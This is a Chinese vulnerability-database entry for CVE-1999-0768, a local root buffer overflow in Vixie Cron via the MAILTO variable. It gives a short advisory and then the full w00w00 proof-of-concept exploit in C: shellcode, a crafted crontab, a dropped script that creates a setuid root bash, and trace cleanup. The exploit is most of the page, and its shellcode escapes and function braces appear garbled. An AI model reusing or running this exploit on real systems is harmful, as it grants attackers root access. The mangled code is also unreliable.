Vixie Cron缓冲器溢出漏洞
漏洞ID | 1105524 | 漏洞类型 | 缓冲区溢出 |
发布时间 | 1999-08-25 | 更新时间 | 2005-05-02 |
CVE编号 | CVE-1999-0768 |
CNNVD-ID | CNNVD-199908-050 |
漏洞平台 | Linux | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
基于RedHat系统的VixieCron存在缓冲区溢出漏洞。可以借助MAILTO环境变量导致该漏洞。
|漏洞EXP
source: http://www.securityfocus.com/bid/602/info
The version of Vixie cron that ships with RedHat versions 4.2, 5.2 and 6.0 is vulnerable to a local buffer overflow attack. By utilizing the MAILTO environment variable, a buffer can be overflown in the cron_popen() function, allowing an attacker to execute arbitrary code. Vixie cron daemon is installed setuid root by default, allowing for a local root compromise. Recent versions of Debian GNU/Linux have been confirmed to not be vulnerable to this attack.
/*
* VixieCron 3.0 Proof of Concept Exploit - w00w00
*
* Not only does Paul give up root with this one, but with his creative use of
* strtok() he actually ends up putting the address of our shellcode in eip.
*
* Many Thanks: Cheez Wiz, Sangfroid
* Thanks: stran9er, Shok
* Props: attrition.org,mea_culpa,awr,minus,Int29,napster,el8.org,w00w00
* Drops: Vixie, happyhacker.org, antionline.com, <insert your favorite web
* defacement group here>
*
* Hellos: pm,cy,bm,ceh,jm,pf,bh,wjg,spike.
*
* [email protected]
*
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <pwd.h>
char shellcode[] =
"xebx40x5ex89x76x0cx31xc0x89x46x0bx89xf3xeb"
"x27w00w00:Ifwewerehackerswedownyourdumbassx8dx4e"
"x0cx31xd2x89x56x16xb0x0bxcdx80xe8xbbxffxff"
"xff/tmp/w00w00";
int
main(int argc,char *argv[])
FILE *cfile,*tmpfile;
struct stat sbuf;
struct passwd *pw;
int x;
pw = getpwuid(getuid());
chdir(pw->pw_dir);
cfile = fopen("./cronny","a+");
tmpfile = fopen("/tmp/w00w00","a+");
fprintf(cfile,"MAILTO=");
for(x=0;x<96;x++)
fprintf(cfile,"w00w00 ");
fprintf(cfile,"%s",shellcode);
fprintf(cfile,"n* * * * * daten");
fflush(cfile);
fprintf(tmpfile,"#!/bin/shncp /bin/bash %snchmod 4755 %s/bashn", pw->pw_dir,pw->pw_dir);
fflush(tmpfile);
fclose(cfile),fclose(tmpfile);
chmod("/tmp/w00w00",S_IXUSR|S_IXGRP|S_IXOTH);
if(!(fork())) {
execl("/usr/bin/crontab","crontab","./cronny",(char *)0);
} else {
printf("Waiting for shell be patient....n");
for(;;) {
if(!(stat("./bash",&sbuf))) {
break;
} else { sleep(5); }
}
if((fork())) {
printf("Thank you for using w00warez!n");
execl("./bash","bash",(char *)0);
} else {
remove("/tmp/w00w00");
sleep(5);
remove("./bash");
remove("./cronny");
execl("/usr/bin/crontab","crontab","-r",(char *)0);
}
}
}
|参考资料
来源:BID
名称:602
链接:http://www.securityfocus.com/bid/602
相关推荐: Microsoft Windows XP快速用户切换进程查看漏洞
Microsoft Windows XP快速用户切换进程查看漏洞 漏洞ID 1203551 漏洞类型 权限许可和访问控制 发布时间 2002-11-29 更新时间 2002-12-31 CVE编号 CVE-2002-2283 CNNVD-ID CNNVD-20…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666